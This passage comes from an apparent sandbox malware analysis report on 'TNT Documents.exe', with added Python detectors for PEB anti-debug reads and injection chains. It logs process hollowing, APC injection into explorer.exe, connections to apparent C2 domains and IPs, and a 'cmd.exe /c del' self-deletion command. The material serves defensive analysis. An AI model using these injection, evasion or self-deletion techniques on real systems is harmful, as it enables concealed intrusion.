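        if code[i] in ONE_BYTE_MEM_OPS and i + 2 < len(code):
            modrm, disp = code[i + 1], code[i + 2]
        elif code[i] == 0x0F and i + 3 < len(code) and code[i + 1] in (0xB6, 0xB7):
            modrm, disp = code[i + 2], code[i + 3]      # movzx r32, r/m8 | r/m16
        else:
            continue
        if (modrm & 0xC7) == want:
            return PEB_FIELDS.get(disp, f"+0x{disp:02X}")
    return None


def find_peb_loads(code: bytes, base: int = 0) -> List[Dict[str, object]]:
    """One record per fs:[30h] load: offset, destination register, PEB field read next."""
    hits: List[Dict[str, object]] = []
    for m in PEB_LOAD.finditer(code):
        opcode = code[m.start() + 1]
        reg = 0 if opcode == 0xA1 else (code[m.start() + 2] >> 3) & 7
        hits.append({
            "offset": base + m.start(),
            "reg": REG_NAMES[reg],
            "field": _following_field(code, m.end(), reg),
            "text": f"mov {REG_NAMES[reg]}, dword ptr fs:[00000030h]",
        })
    return hits


def summarize(hits: List[Dict[str, object]]) -> Dict[str, int]:
    """Count which PEB fields are read; loads with no recognised follow-up are 'unresolved'."""
    counts: Dict[str, int] = {}
    for h in hits:
        key = str(h["field"] or "unresolved")
        counts[key] = counts.get(key, 0) + 1
    return counts


# Constructed sample: three PEB loads, each followed by a classic check.
SAMPLE = bytes.fromhex(
    "55 8B EC "               # push ebp; mov ebp, esp
    "64 A1 30 00 00 00 "      # mov eax, dword ptr fs:[30h]
    "0F B6 40 02 "            # movzx eax, byte ptr [eax+2]    -> PEB.BeingDebugged
    "85 C0 75 05 "            # test eax, eax; jnz short +5
    "64 8B 0D 30 00 00 00 "   # mov ecx, dword ptr fs:[30h]
    "8B 41 68 "               # mov eax, dword ptr [ecx+68h]   -> PEB.NtGlobalFlag
    "A9 70 00 00 00 "         # test eax, 70h
    "64 8B 05 30 00 00 00 "   # mov eax, dword ptr fs:[30h]
    "8B 40 0C "               # mov eax, dword ptr [eax+0Ch]   -> PEB.Ldr (module list walk)
    "C3"                      # ret
)

if __name__ == "__main__":
    # The base is arbitrary; it only makes the output look like the report's address column.
    for hit in find_peb_loads(SAMPLE, base=0x055B0000):
        print(f"{hit['offset']:08X} {hit['text']}  ->  {hit['field']}")
    print(summarize(find_peb_loads(SAMPLE)))
```

          Run against a dumped code section (for example the region the report's 17_2_055Bxxxx-17_2_0568xxxx addresses fall into), the field summary tells you quickly whether the PEB reads are debugger checks (BeingDebugged, NtGlobalFlag) or ordinary module resolution through Ldr, which the unlabelled disassembly lines alone do not.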

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Domain query: www.metronixmedical.com
          Source: C:\Windows\explorer.exe, Domain query: www.specialtyplastics.online
          Source: C:\Windows\explorer.exe, Network Connect: 51.255.30.106 80
          Source: C:\Windows\explorer.exe, Network Connect: 119.18.54.99 80
          Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe, Domain query: www.cortepuroiberico.com
          Source: C:\Windows\explorer.exe, Network Connect: 209.17.116.163 80
          Source: C:\Windows\explorer.exe, Domain query: www.coached.info
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\TNT Documents.exe, Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: EC0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\TNT Documents.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TNT Documents.exe, Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TNT Documents.exe, Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mstsc.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exe, Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign process
          Source: C:\Users\user\Desktop\TNT Documents.exe, Memory written: C:\Users\user\Desktop\TNT Documents.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\TNT Documents.exe, Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\TNT Documents.exe, Thread register set: target process: 3292
          Source: C:\Windows\SysWOW64\mstsc.exe, Thread register set: target process: 3292
          Source: C:\Users\user\Desktop\TNT Documents.exe, Process created: C:\Users\user\Desktop\TNT Documents.exe {path}
          Source: C:\Users\user\Desktop\TNT Documents.exe, Process created: C:\Users\user\Desktop\TNT Documents.exe {path}
          Source: C:\Windows\SysWOW64\mstsc.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TNT Documents.exe"
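          The entries from "System process connects to network" down to the cmd.exe /c del line are pieces of one chain: the sample unmaps the image of a freshly started mstsc.exe and writes into it (hollowing), both the sample and mstsc.exe map execute-read-write sections into explorer.exe and queue an APC there, explorer.exe then resolves the C2 domains and connects on port 80, and mstsc.exe deletes the original file. The following correlator is an added example, not Joe Sandbox code: it groups injection primitives per source/target pair, names the technique from the combination (unmapped section plus thread context set is hollowing, mapped section plus queued APC is APC injection), follows the taint from the sample into every process it wrote to, and raises alerts for network activity by a tainted system binary and for a cmd.exe deletion of the initial sample. The event list is constructed to mirror the entries above. The report names the thread-context target only as PID 3292; the constructed data assumes that is the hollowed mstsc.exe, which the report does not state. Processes are identified by image name, so the 4D5A write into a second instance of the sample itself appears as a self-edge and is deliberately not counted as cross-process injection.

```python
"""Correlate per-process behaviour events into an injection chain plus alerts.

Added example for this report (not Joe Sandbox code). EVENTS is constructed to
mirror the report entries; the one assumption it makes is marked inline.
"""
from collections import defaultdict
from typing import Dict, List, Set, Tuple

Event = Dict[str, str]
Edge = Tuple[str, str]

# Actions that place code in, or redirect execution of, another process.
INJECT_ACTIONS = {"section_unmapped", "section_mapped", "memory_written",
                  "thread_context_set", "apc_queued"}
# Windows binaries that do not resolve arbitrary domains or speak HTTP on their own;
# traffic from one of them after it has been injected into is the alert condition.
SYSTEM_IMAGES = {"explorer.exe", "mstsc.exe", "svchost.exe", "dllhost.exe"}

EVENTS: List[Event] = [  # constructed; processes are identified by image name only
    {"src": "TNT Documents.exe", "action": "process_created", "target": "TNT Documents.exe", "detail": "{path}"},
    {"src": "TNT Documents.exe", "action": "memory_written", "target": "TNT Documents.exe", "detail": "base=400000 starts=4D5A"},
    {"src": "TNT Documents.exe", "action": "section_unmapped", "target": "mstsc.exe", "detail": "base=EC0000"},
    {"src": "TNT Documents.exe", "action": "section_mapped", "target": "mstsc.exe", "detail": "protection=RWX"},
    # Assumption: the report gives this target only as PID 3292; treated here as the hollowed mstsc.exe.
    {"src": "TNT Documents.exe", "action": "thread_context_set", "target": "mstsc.exe", "detail": "pid=3292 (assumed)"},
    {"src": "TNT Documents.exe", "action": "section_mapped", "target": "explorer.exe", "detail": "protection=RWX"},
    {"src": "TNT Documents.exe", "action": "apc_queued", "target": "explorer.exe", "detail": ""},
    {"src": "mstsc.exe", "action": "section_mapped", "target": "explorer.exe", "detail": "protection=RW"},
    {"src": "mstsc.exe", "action": "section_mapped", "target": "explorer.exe", "detail": "protection=RWX"},
    {"src": "explorer.exe", "action": "domain_query", "target": "www.metronixmedical.com", "detail": ""},
    {"src": "explorer.exe", "action": "network_connect", "target": "51.255.30.106", "detail": "port=80"},
    {"src": "mstsc.exe", "action": "process_created", "target": "cmd.exe",
     "detail": '/c del "C:\\Users\\user\\Desktop\\TNT Documents.exe"'},
]


def injection_edges(events: List[Event]) -> Dict[Edge, Set[str]]:
    """Group cross-process injection primitives by (source, target); self-edges are skipped."""
    edges: Dict[Edge, Set[str]] = defaultdict(set)
    for e in events:
        if e["action"] in INJECT_ACTIONS and e["src"] != e["target"]:
            edges[(e["src"], e["target"])].add(e["action"])
    return dict(edges)


def classify(actions: Set[str]) -> str:
    """Name the technique from the combination of primitives seen on one edge."""
    if "section_unmapped" in actions and "thread_context_set" in actions:
        return "process hollowing"        # original image unmapped, payload placed, thread redirected
    if "apc_queued" in actions:
        return "APC injection"            # payload mapped in, execution via a queued user APC
    if "thread_context_set" in actions:
        return "thread hijacking"
    return "memory/section injection"     # code placed, no execution primitive observed on this edge


def tainted_processes(root: str, edges: Dict[Edge, Set[str]]) -> Set[str]:
    """Every process the sample injected into, transitively."""
    tainted: Set[str] = set()
    frontier = [root]
    while frontier:
        cur = frontier.pop()
        for src, dst in edges:
            if src == cur and dst not in tainted:
                tainted.add(dst)
                frontier.append(dst)
    return tainted


def longest_chain(root: str, edges: Dict[Edge, Set[str]]) -> List[str]:
    """Longest injection path starting at the sample; cycle-safe for noisy telemetry."""
    succ: Dict[str, Set[str]] = defaultdict(set)
    for src, dst in edges:
        succ[src].add(dst)
    best = [root]

    def walk(path: List[str]) -> None:
        nonlocal best
        if len(path) > len(best):
            best = list(path)
        for nxt in sorted(succ[path[-1]]):
            if nxt not in path:
                walk(path + [nxt])

    walk([root])
    return best


def alerts(events: List[Event], root: str) -> List[str]:
    """Technique per edge, then network and self-deletion alerts tied to the tainted set."""
    edges = injection_edges(events)
    tainted = tainted_processes(root, edges)
    out = [f"{classify(acts)}: {src} -> {dst} ({', '.join(sorted(acts))})"
           for (src, dst), acts in sorted(edges.items())]
    for e in events:
        if (e["action"] in ("domain_query", "network_connect")
                and e["src"] in tainted and e["src"] in SYSTEM_IMAGES):
            out.append(f"system process network activity after injection: "
                       f"{e['src']} -> {e['target']} {e['detail']}".rstrip())
        if (e["action"] == "process_created" and e["target"].lower() == "cmd.exe"
                and " del " in f" {e['detail'].lower()} " and root.lower() in e["detail"].lower()):
            out.append(f"self-deletion of initial sample: {e['src']} spawned cmd.exe {e['detail']}")
    return out


if __name__ == "__main__":
    print(" -> ".join(longest_chain("TNT Documents.exe", injection_edges(EVENTS))))
    for line in alerts(EVENTS, "TNT Documents.exe"):
        print(line)
```

          The point of carrying the taint set into the network and self-deletion checks is that none of those events is suspicious in isolation: explorer.exe talking HTTP, or cmd.exe deleting a file, only becomes an alert because the process doing it was written into by the sample a few events earlier.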
          Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmp, Binary or memory string: uProgram Manager
          Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.319293642.0000000005F40000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmp, Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmp, Binary or memory string: Progman
          Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmp, Binary or memory string: Progmanlock
          Source: explorer.exe, 0000000B.00000000.336206590.0000000000EB8000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.314892260.0000000000EB8000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.294735677.0000000000EB8000.00000004.00000020.sdmp, Binary or memory string: ProgmanX
          Source: explorer.exe, 0000000B.00000000.344277023.0000000008ACF000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.323053985.0000000008ACF000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.305962402.0000000008ACF000.00000004.00000001.sdmp, Binary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Users\user\Desktop\TNT Documents.exe VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exe, Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
